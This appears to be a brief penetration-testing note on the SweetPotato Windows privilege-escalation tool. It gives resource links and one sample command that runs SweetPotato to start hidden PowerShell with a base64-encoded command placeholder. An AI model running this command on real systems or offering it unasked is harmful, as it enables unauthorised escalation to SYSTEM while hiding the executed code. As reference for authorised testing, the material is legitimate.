potatoes
These can be real handy for local privesc. Some resources:
SweetPotato
- Where to get it: https://github.com/CCob/SweetPotato
- How it works: https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all#bkmrk-how-it-works-5
- Using it to escalate privs:https://www.pentestpartners.com/security-blog/sweetpotato-service-to-system/
- Sample command line syntax:
Cmd > .\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"